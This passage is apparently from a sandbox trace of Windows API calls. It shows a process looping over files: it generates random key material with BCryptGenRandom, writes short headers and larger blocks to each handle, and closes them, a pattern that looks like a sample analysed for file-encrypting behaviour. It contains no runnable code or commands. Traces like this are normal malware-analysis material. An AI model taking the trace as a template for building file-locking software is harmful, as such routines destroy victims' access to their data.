lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.250] CloseHandle (hObject=0x3cc) returned 1 [0153.250] free (_Block=0x3e70008) [0153.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.254] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xcec6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0153.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.256] CloseHandle (hObject=0x338) returned 1 [0153.256] free (_Block=0x3d70450) [0153.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.280] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.280] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.280] free (_Block=0x3e305b8) [0153.280] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.280] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.280] free (_Block=0x1fa91d0) [0153.280] free (_Block=0x1fa2ed8) [0153.280] free (_Block=0x1fa90b8) [0153.280] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.289] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x4b40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.290] CloseHandle (hObject=0x170) returned 1 [0153.290] free (_Block=0x3ef0008) [0153.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.301] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.301] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.301] free (_Block=0x3e305b8) [0153.301] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.301] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.302] free (_Block=0x1fa91d0) [0153.302] free (_Block=0x1fa2ed8) [0153.302] free (_Block=0x1fa90b8) [0153.302] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.304] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x80e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.316] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xcba0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.330] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5700, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.332] CloseHandle (hObject=0x170) returned 1 [0153.332] free (_Block=0x3df0008) [0153.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.343] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.343] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.343] free (_Block=0x3e305b8) [0153.343] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.343] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.344] free (_Block=0x1fa91d0) [0153.344] free (_Block=0x1fa2ed8) [0153.344] free (_Block=0x1fa90b8) [0153.344] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.344] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.345] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.346] CloseHandle (hObject=0x170) returned 1 [0153.347] free (_Block=0x3df0008) [0153.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.355] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.355] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.356] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.356] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.356] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.356] free (_Block=0x3e305b8) [0153.356] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.356] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.357] free (_Block=0x1fa91d0) [0153.357] free (_Block=0x1fa2ed8) [0153.357] free (_Block=0x1fa90b8) [0153.357] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.358] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x51c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.359] CloseHandle (hObject=0x170) returned 1 [0153.359] free (_Block=0x3df0008) [0153.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.369] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.369] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.369] free (_Block=0x3e305b8) [0153.369] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.369] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.370] free (_Block=0x1fa91d0) [0153.370] free (_Block=0x1fa2ed8) [0153.370] free (_Block=0x1fa90b8) [0153.370] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.372] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x59a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.373] CloseHandle (hObject=0x170) returned 1 [0153.373] free (_Block=0x3df0008) [0153.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.382] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.383] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.383] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.383] free (_Block=0x3e305b8) [0153.383] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.383] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.383] free (_Block=0x1fa91d0) [0153.384] free (_Block=0x1fa2ed8) [0153.384] free (_Block=0x1fa90b8) [0153.384] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.385] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.396] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1d3c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.398] CloseHandle (hObject=0x170) returned 1 [0153.398] free (_Block=0x3df0008) [0153.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.407] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.408] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.408] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.408] free (_Block=0x3e305b8) [0153.408] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.408] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.409] free (_Block=0x1fa91d0) [0153.409] free (_Block=0x1fa2ed8) [0153.409] free (_Block=0x1fa90b8) [0153.409] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.409] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.410] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.422] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1284, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.423] CloseHandle (hObject=0x170) returned 1 [0153.423] free (_Block=0x3df0008) [0153.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.431] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.433] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.433] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.433] free (_Block=0x3e305b8) [0153.433] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.433] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.433] free (_Block=0x1fa91d0) [0153.433] free (_Block=0x1fa2ed8) [0153.433] free (_Block=0x1fa90b8) [0153.433] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.435] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.435] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.451] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1294, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.452] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.452] CloseHandle (hObject=0x170) returned 1 [0153.452] free (_Block=0x3df0008) [0153.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0153.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0153.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0153.463] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.463] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.463] free (_Block=0x3e305b8) [0153.463] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.463] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.463] free (_Block=0x1fa91d0) [0153.463] free (_Block=0x1fa2ed8) [0153.463] free (_Block=0x1fa90b8) [0153.463] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: 